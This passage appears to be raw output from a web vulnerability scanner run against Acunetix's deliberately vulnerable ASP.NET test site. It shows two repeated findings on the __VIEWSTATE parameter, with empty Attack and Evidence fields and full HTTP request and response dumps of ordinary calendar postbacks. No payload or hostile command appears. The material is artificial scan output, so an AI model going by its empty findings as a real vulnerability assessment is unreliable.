href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8204&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBA2Xy9UNoIZGRk0mKyu8iW2K%2FkaKXLYRMop1aCTZE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKLxdmECwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9Opms655h7sQdBneCWHMC8HQLUew%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:41 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBA2Xy9UNoIZGRk0mKyu8iW2K/kaKXLYRMop1aCTZE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKLxdmECwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9Opms655h7sQdBneCWHMC8HQLUew==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:White" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8192&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBA5H9PR9oIZGRkxnHz5kQrYg1S0TTmHMlIOym%2B648%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQhIcJArrjr%2BwOApyKwu8BAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6%2FSUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng%2FQwC19ng%2FQwC19mUkAQC19mUkAQC19nI%2BQIC19nI%2BQIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW%2Fw8CqOCW%2Fw8CqOCKkgcCqOCKkgcCqOC%2BKQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg%2BocKAqjg%2BocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9%2FTiBQKN9%2FTiBQKN9%2Bi5DQKN9%2Bi5DQKN95zcBgKN95zcBgKN97DzDwKN97DzDzw0xXJUaMtGmgHD9FCcM001Uo7U
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:46 GMT Content-Length: 12440
Response Body - size: 12,440 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBA5H9PR9oIZGRkxnHz5kQrYg1S0TTmHMlIOym+648=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQhIcJArrjr+wOApyKwu8BAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6/SUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng/QwC19ng/QwC19mUkAQC19mUkAQC19nI+QIC19nI+QIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW/w8CqOCW/w8CqOCKkgcCqOCKkgcCqOC+KQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg+ocKAqjg+ocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9/TiBQKN9/TiBQKN9+i5DQKN9+i5DQKN95zcBgKN95zcBgKN97DzDwKN97DzDzw0xXJUaMtGmgHD9FCcM001Uo7U" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:White" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> 